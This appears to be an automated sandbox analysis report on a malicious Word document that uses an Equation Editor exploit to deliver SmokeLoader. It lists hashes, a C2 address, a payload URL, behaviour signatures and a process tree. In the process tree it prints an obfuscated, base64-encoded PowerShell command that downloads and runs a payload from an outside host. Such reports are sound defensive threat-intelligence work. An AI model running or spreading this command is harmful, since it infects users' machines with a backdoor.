Analysis
- max time kernel: 100s
- max time network: 102s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 13-04-2021 05:42
- Static task: static1
- Behavioral task: behavioral1 (Sample: 2021lk049459.doc; Resource: win7v20210410)
- Behavioral task: behavioral2 (Sample: 2021lk049459.doc; Resource: win10v20210408)
General
- Target: 2021lk049459.doc
- Size: 2.2MB
- MD5: 40f9df41effa8762858974452db083d9
- SHA1: fd382c2ae4ad3545b5d198d8c51735045584f8ce
- SHA256: 06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd
- SHA512: f09b0b5415ac3f1c9af5f13774bb01675540a3238ac23301b404f13fb847f62725e7ad03f7de7b0fbecf19c90ee2be53b5e7b09aada12780f7685258b54f58f2
Malware Config
- Extracted: https://u.teknik.io/bHrgG.jpg
- Extracted: Family smokeloader; Version 2018; C2 http://94.140.114.59/1/
Signatures
- SmokeLoader
  Modular backdoor trojan in use since 2014.
- Blocklisted process makes network request (4 IoCs)
  flow | pid | process
  6 | 1368 | EQNEDT32.EXE
  8 | 1368 | EQNEDT32.EXE
  10 | 1368 | EQNEDT32.EXE
  11 | 1752 | powershell.exe
- Executes dropped EXE (2 IoCs)
  pid | process
  296 | 69577.exe
  1228 | nTvWNOa.exe
- Loads dropped DLL (3 IoCs)
  pid | process
  1368 | EQNEDT32.EXE
  1752 | powershell.exe
  1752 | powershell.exe
- Maps connected drives based on registry (3 TTPs, 2 IoCs)
  Disk information is often read in order to detect sandboxing environments.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | nTvWNOa.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | nTvWNOa.exe
- Drops file in System32 directory (2 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- Drops file in Windows directory (1 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
- Office loads VBA resources, possible macro or embedded object present
- Launches Equation Editor (1 TTPs, 1 IoCs)
  Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
- Modifies Internet Explorer settings
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
  Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid | process
  768 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | process
  640 | powershell.exe
  640 | powershell.exe
  1752 | powershell.exe
  1752 | powershell.exe
- Suspicious behavior: MapViewOfSection (2 IoCs)
  pid | process
  1228 | nTvWNOa.exe
  1228 | nTvWNOa.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 640 | powershell.exe
  Token: SeDebugPrivilege | 1752 | powershell.exe
- Suspicious use of FindShellTrayWindow (11 IoCs)
  pid | process
  296 | 69577.exe (11 identical entries)
- Suspicious use of SendNotifyMessage (11 IoCs)
  pid | process
  296 | 69577.exe (11 identical entries)
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | process
  768 | WINWORD.EXE
  768 | WINWORD.EXE
- Suspicious use of WriteProcessMemory (20 IoCs)
  description | pid | process | target process
  PID 768 wrote to memory of 852 | 768 | WINWORD.EXE | splwow64.exe (4 identical entries)
  PID 1368 wrote to memory of 296 | 1368 | EQNEDT32.EXE | 69577.exe (4 identical entries)
  PID 296 wrote to memory of 640 | 296 | 69577.exe | powershell.exe (4 identical entries)
  PID 640 wrote to memory of 1752 | 640 | powershell.exe | powershell.exe (4 identical entries)
  PID 1752 wrote to memory of 1228 | 1752 | powershell.exe | nTvWNOa.exe (4 identical entries)
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049459.doc"
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe (depth 2)
    Command line: C:\Windows\splwow64.exe 12288
- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (depth 1)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  - C:\Users\Public\69577.exe (depth 2)
    Command line: "C:\Users\Public\69577.exe"
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
        - Blocklisted process makes network request
        - Loads dropped DLL
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe (depth 5)
          Command line: "C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
          - Executes dropped EXE
          - Maps connected drives based on registry
          - Suspicious behavior: MapViewOfSection
Downloads
- C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
  MD5: 3cf58ec9de521b32015552ca3024d1cd
  SHA1: 539236ecd9d859f82f89311bfd564906aa98451e
  SHA256: ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace
  SHA512: 25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 8ae81224c95faf7008d0f5778a8badf0
  SHA1: 2e4930dddf0bb31c9bf139181029f83c0d4e65c5
  SHA256: a425f2b734ab7b2ee6d417299a38958f3b63c558c8fb29d0b4bb34a1d0458922
  SHA512: b7c34aa6d4ed0c16f61beeee5e3ddc5d58e5fb61085d76cc60c2ac09e8601209ca43c1e029e901f003764cd1f6c665010b9e3cedfadc533c873613a0330ade23
- C:\Users\Public\69577.exe
  MD5: 2c2cb2aa0782874d3c14cdd6f063f979
  SHA1: 583c43ca939f9d8a4eea53a7d71157ac3571a350
  SHA256: c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da
  SHA512: 34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26